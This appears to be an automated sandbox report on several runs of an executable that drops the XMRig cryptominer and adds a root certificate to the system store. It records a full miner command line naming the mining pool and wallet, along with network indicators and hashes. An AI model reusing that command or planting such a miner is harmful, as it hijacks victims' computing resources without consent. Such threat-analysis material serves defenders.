memory/2360-44-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-45-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-46-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-47-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-48-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-49-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-50-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-51-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-52-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-53-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-54-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-55-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-56-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-57-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-58-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-59-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-60-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-61-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-62-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-63-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-64-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-65-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-66-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-67-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-68-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-69-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-70-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-71-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-72-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-73-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-74-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-75-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-76-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-77-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-78-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-79-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-80-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-81-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-82-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-83-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-84-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value not reproduced) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value not reproduced) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 656 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 656 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.17.178.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1844-16-0x000001FDBCBB0000-0x000001FDBCBD0000-memory.dmp
memory/1844-17-0x000001FDBCC00000-0x000001FDBCC20000-memory.dmp
memory/1844-18-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-19-0x000001FDBE400000-0x000001FDBE420000-memory.dmp
memory/1844-20-0x000001FDBE3E0000-0x000001FDBE400000-memory.dmp
memory/1844-21-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-22-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-25-0x000001FDBE3E0000-0x000001FDBE400000-memory.dmp
memory/1844-24-0x000001FDBE400000-0x000001FDBE420000-memory.dmp
memory/1844-23-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-26-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-27-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-28-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-29-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-30-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-31-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-32-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-33-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-34-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-35-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-36-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-37-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-38-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-39-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-40-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-41-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-42-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-43-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-44-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-45-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-46-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-47-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-48-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-49-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-50-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-51-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-52-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-53-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-54-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-55-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-56-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-57-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-58-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-59-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-60-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-61-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-62-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-63-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-64-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-65-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-66-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-67-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-68-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-69-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-70-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-71-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-72-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-73-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-74-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-75-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-76-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-77-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-78-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-79-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-80-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-81-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-82-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-83-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-84-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4836 wrote to memory of 2060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4836 wrote to memory of 2060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2060-16-0x0000029A17F10000-0x0000029A17F30000-memory.dmp
memory/2060-17-0x0000029A17F60000-0x0000029A17F80000-memory.dmp
memory/2060-18-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-21-0x0000029A17FA0000-0x0000029A17FC0000-memory.dmp
memory/2060-19-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-20-0x0000029A17F80000-0x0000029A17FA0000-memory.dmp
memory/2060-22-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-23-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-24-0x0000029A17F80000-0x0000029A17FA0000-memory.dmp
memory/2060-25-0x0000029A17FA0000-0x0000029A17FC0000-memory.dmp
memory/2060-26-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-27-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-28-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-29-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-30-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-31-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-32-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-33-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-34-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-35-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-36-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-37-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-38-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-39-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-40-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-41-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-42-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-43-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-44-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-45-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-46-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-47-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-48-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-49-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-50-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-51-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-52-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-53-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-54-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-55-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-56-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-57-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-58-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-59-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-60-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-61-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-62-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-63-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-64-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-65-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-66-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-67-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-68-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-69-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-70-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-71-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-72-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-73-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-74-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-75-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-76-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-77-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-78-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-79-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-80-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-81-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-82-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-83-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-84-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4588 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4588 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
